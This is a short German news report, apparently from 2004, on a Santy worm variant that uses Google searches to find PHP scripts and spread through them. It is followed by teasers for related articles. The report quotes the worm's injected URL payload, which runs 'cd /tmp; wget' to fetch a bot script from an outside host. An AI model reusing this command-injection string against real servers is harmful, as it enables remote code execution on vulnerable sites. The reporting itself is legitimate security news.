Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
PHP 5.0 kommt
Seit gestern, dem 29.06.03 ist der erste Beta Release von PHP 5.0 zum Download freigegeben. PHP 5 wird die Zend Engine 2 unterstützen, der XML Support wurde komplett erneuert und SQLite kommt nun zusammen mit PHP. Weitere Neuheiten finden Sie auf der S ...
Autor :
admin
Kategorie:
Software & Web-Development
IE-Toolbar für Web-Designer
Microsofts Toolbar will Webseitengestaltern die Arbeit erleichtern. Speziell für Web-Designer hat Microsoft eine Toolbar für den Internet Explorer erarbeitet, die bei der Entwicklung von Webseiten helfen soll. Dazu lassen sich einzelne Bereiche einer Seit ...
Autor :
admin
Kategorie:
Software & Web-Development
Neue PHP Versionen
Die freie Webskriptsprache PHP ist in neuen Versionen erhältlich. PHP 4.3.11 umfasst über 70 Bugfixes, die sich seit der letzten Version angesammelt hatten -- darunter Sicherheitslücken unter anderem in der Verarbeitung von Bilddateien und bei der Ansteue ...
Autor :
admin
Kategorie:
Software & Web-Development
Windows XP: Neue Version nicht für PCs vorgesehen
Heute hat Microsoft eine spezielle und neue Version von Windows XP angekündigt. Diese Version soll zum Beispiel zur Anwendung in Registrierkassen oder Set-Top Boxen der PayTV-Anbieter kommen. Diese neue Version, hauptsächlich auf der XP-Grundversion ...
Autor :
admin
Kategorie:
Software & Web-Development
PHP 4.3.5RC1 veröffentlicht
PHP 4.3.5RC1 wurde zum Testen freigegeben. Dies ist der erste Release Kandidat und sollte eine sehr kleine Anzahl von Problemen und Bugs haben. Nichts desto trotz, sollte diese Version nur zum Testen von realen Applikationen verwendet werden, um weitere P ...
Autor :
admin
Kategorie:
Software & Web-Development
PHP World Kongress – 24. – 25. November 2009 Konferenzzentrum München
Unsere Mitglieder erhalten einen Rabatt von € 100,- Ferner verlosen wir eine Freikarte! ...
Autor :
admin
Kategorie:
Software & Web-Development

